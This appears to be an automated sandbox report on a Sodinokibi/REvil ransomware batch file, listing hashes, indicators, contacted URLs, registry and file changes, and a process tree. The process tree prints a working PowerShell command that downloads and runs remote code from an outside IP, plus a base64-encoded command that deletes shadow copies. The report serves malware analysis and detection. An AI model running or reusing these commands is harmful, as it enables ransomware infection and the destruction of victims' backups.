Analysis
-
max time kernel
134s -
max time network
142s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
05-05-2020 19:10
Static task
static1
Behavioral task
behavioral1
Sample
Sm5WHtYm.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
Sm5WHtYm.bat
Resource
win10v200430
General
-
Target
Sm5WHtYm.bat
-
Size
193B
-
MD5
89479f503f8853ef6d980710e78294c3
-
SHA1
816b60d4a2d1038ad57182c3356639a7f595e519
-
SHA256
94da60b220dfc957c34baa5386d0758c38afb21752e7bc55bf7a0ee19bd752b1
-
SHA512
ae9a1fb7b5f6e95e07cf2515e55dd6d4d98ae2b40af5995c645bf9c808b8326894ed1f98ebd678594f3ea259af28dffabf29419573e7923a9984a55ea419d61d
Malware Config
Extracted
http://185.103.242.78/pastes/Sm5WHtYm
Extracted
C:\8372l6bpv-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/15CF157DDDA55355
http://decryptor.cc/15CF157DDDA55355
Signatures
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 748 powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 676 wrote to memory of 748 676 cmd.exe powershell.exe PID 748 wrote to memory of 1556 748 powershell.exe powershell.exe PID 748 wrote to memory of 1556 748 powershell.exe powershell.exe PID 748 wrote to memory of 1556 748 powershell.exe powershell.exe PID 748 wrote to memory of 1556 748 powershell.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 748 powershell.exe Token: SeDebugPrivilege 748 powershell.exe Token: SeDebugPrivilege 1556 powershell.exe Token: SeBackupPrivilege 2008 vssvc.exe Token: SeRestorePrivilege 2008 vssvc.exe Token: SeAuditPrivilege 2008 vssvc.exe Token: SeTakeOwnershipPrivilege 748 powershell.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\CatRoot2\dberr.txt powershell.exe -
Processes:
powershell.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 430000000100000000000000040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f007400200043004100200058003300000020000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703082000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b0b000000010000001600000047006c006f00620061006c005300690067006e0000005300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b06010505080202200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 powershell.exe -
Makes http(s) request 36 IoCs
Contacts server via http/https, possibly for C2 communication.
Processes:
description flow ioc HTTP URL 18 http://apps.identrust.com/roots/dstrootcax3.p7c HTTP URL 35 https://www.waynela.com/include/assets/enbtkimrwq.png HTTP URL 41 https://antonmack.de/uploads/graphic/vwtxlxhi.png HTTP URL 68 https://esope-formation.fr/news/temp/knoxfffk.jpg HTTP URL 104 https://thomas-hospital.de/news/tmp/lcisybxg.png HTTP URL 85 https://huissier-creteil.com/static/pictures/zc.png HTTP URL 4 http://185.103.242.78/pastes/Sm5WHtYm HTTP URL 26 https://completewedo.com/kansas/data/pics/azwxcmysazbn.gif HTTP URL 56 https://vibethink.net/data/tmp/cqjz.jpg HTTP URL 70 https://plastidip.com.ar/include/pics/pujxemelmidqax.gif HTTP URL 75 https://www.zieglerbrothers.de/data/pics/ehcmmpww.gif HTTP URL 100 https://polzine.net/data/images/ylurpd.jpg HTTP URL 45 https://zimmerei-deboer.de/wp-content/pics/euinkulupn.gif HTTP URL 50 https://x-ray.ca/news/temp/koetdb.jpg HTTP URL 51 https://x-ray.ca/ HTTP URL 65 https://nachhilfe-unterricht.com/content/tmp/hy.gif HTTP URL 96 https://restaurantesszimmer.de/news/temp/wqmangyjmamw.jpg HTTP URL 94 https://ilive.lt/admin/image/huxzcz.png HTTP URL 106 https://www.thomas-hospital.de/news/tmp/lcisybxg.png HTTP URL 126 https://hexcreatives.co/admin/images/jwdyvbqp.gif HTTP URL 57 https://vibethink.net/ HTTP URL 73 https://zieglerbrothers.de/data/pics/ehcmmpww.gif HTTP URL 92 https://www.huesges-gruppe.de/include/temp/atrl.png HTTP URL 102 https://southeasternacademyofprosthodontics.org/uploads/game/iwojls.gif HTTP URL 22 https://www.pmc-services.de/include/temp/vdbonbwn.jpg HTTP URL 24 https://completeweddingkansas.com/data/pics/azwxcmysazbn.gif HTTP URL 6 https://bloggyboulga.net/content/images/lhnnljurbg.jpg HTTP URL 16 https://pmc-services.de/include/temp/vdbonbwn.jpg HTTP URL 31 https://facettenreich27.de/wp-content/image/qxqdpxasbcvnlp.gif HTTP URL 39 https://makeurvoiceheard.com/news/images/ucqygr.png HTTP URL 63 https://icpcnj.org/static/images/tcvfehqmswqqok.png HTTP URL 20 http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP URL 33 https://waynela.com/include/assets/enbtkimrwq.png HTTP URL 61 https://noesis.tech/admin/game/btdbtacgfagedwqc.gif HTTP URL 83 https://schoolofpassivewealth.com/data/temp/sh.png HTTP URL 90 https://huesges-gruppe.de/include/temp/atrl.png -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 748 powershell.exe 748 powershell.exe 748 powershell.exe 1556 powershell.exe 1556 powershell.exe -
Blacklisted process makes network request 66 IoCs
Processes:
powershell.exeflow pid process 4 748 powershell.exe 6 748 powershell.exe 8 748 powershell.exe 10 748 powershell.exe 11 748 powershell.exe 13 748 powershell.exe 14 748 powershell.exe 16 748 powershell.exe 18 748 powershell.exe 20 748 powershell.exe 22 748 powershell.exe 24 748 powershell.exe 26 748 powershell.exe 28 748 powershell.exe 29 748 powershell.exe 31 748 powershell.exe 33 748 powershell.exe 35 748 powershell.exe 37 748 powershell.exe 39 748 powershell.exe 41 748 powershell.exe 43 748 powershell.exe 45 748 powershell.exe 47 748 powershell.exe 48 748 powershell.exe 50 748 powershell.exe 51 748 powershell.exe 53 748 powershell.exe 54 748 powershell.exe 56 748 powershell.exe 57 748 powershell.exe 59 748 powershell.exe 61 748 powershell.exe 63 748 powershell.exe 65 748 powershell.exe 68 748 powershell.exe 70 748 powershell.exe 73 748 powershell.exe 75 748 powershell.exe 79 748 powershell.exe 80 748 powershell.exe 83 748 powershell.exe 85 748 powershell.exe 87 748 powershell.exe 88 748 powershell.exe 90 748 powershell.exe 92 748 powershell.exe 94 748 powershell.exe 96 748 powershell.exe 98 748 powershell.exe 100 748 powershell.exe 102 748 powershell.exe 104 748 powershell.exe 106 748 powershell.exe 108 748 powershell.exe 109 748 powershell.exe 111 748 powershell.exe 112 748 powershell.exe 114 748 powershell.exe 116 748 powershell.exe 118 748 powershell.exe 119 748 powershell.exe 121 748 powershell.exe 122 748 powershell.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Drops file in Program Files directory 28 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\EnableStep.wmv powershell.exe File opened for modification \??\c:\program files\RequestHide.xhtml powershell.exe File opened for modification \??\c:\program files\ResetUse.odt powershell.exe File opened for modification \??\c:\program files\SelectReceive.jtx powershell.exe File opened for modification \??\c:\program files\SubmitDeny.ps1xml powershell.exe File opened for modification \??\c:\program files\UseAssert.xlt powershell.exe File opened for modification \??\c:\program files\AddStep.vstx powershell.exe File opened for modification \??\c:\program files\DisableSplit.docm powershell.exe File opened for modification \??\c:\program files\RepairStep.dwfx powershell.exe File opened for modification \??\c:\program files\ResetSet.zip powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\8372l6bpv-readme.txt powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\8372l6bpv-readme.txt powershell.exe File opened for modification \??\c:\program files\AddUse.xla powershell.exe File opened for modification \??\c:\program files\EnterLimit.mhtml powershell.exe File opened for modification \??\c:\program files\ResetSend.gif powershell.exe File opened for modification \??\c:\program files\ShowUnprotect.mov powershell.exe File opened for modification \??\c:\program files\StepMerge.nfo powershell.exe File opened for modification \??\c:\program files\UnregisterWrite.js powershell.exe File opened for modification \??\c:\program files\UpdateSearch.MTS powershell.exe File created \??\c:\program files (x86)\8372l6bpv-readme.txt powershell.exe File created \??\c:\program files\microsoft sql server compact edition\8372l6bpv-readme.txt powershell.exe File created \??\c:\program files\8372l6bpv-readme.txt powershell.exe File opened for modification \??\c:\program files\BackupCopy.easmx powershell.exe File opened for modification \??\c:\program files\CompareInstall.jpg powershell.exe File opened for modification \??\c:\program files\CompleteSelect.mp4 powershell.exe File opened for modification \??\c:\program files\SkipEnable.pptm powershell.exe File opened for modification \??\c:\program files\TestOut.vsx powershell.exe File opened for modification \??\c:\program files\AssertRedo.dxf powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ea5q.bmp" powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Sm5WHtYm.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:676 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/Sm5WHtYm');Invoke-OVWRKZKGCK;Start-Sleep -s 10000"2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Drops file in System32 directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Drops file in Program Files directory
- Sets desktop wallpaper using registry
PID:748 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1556
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:2008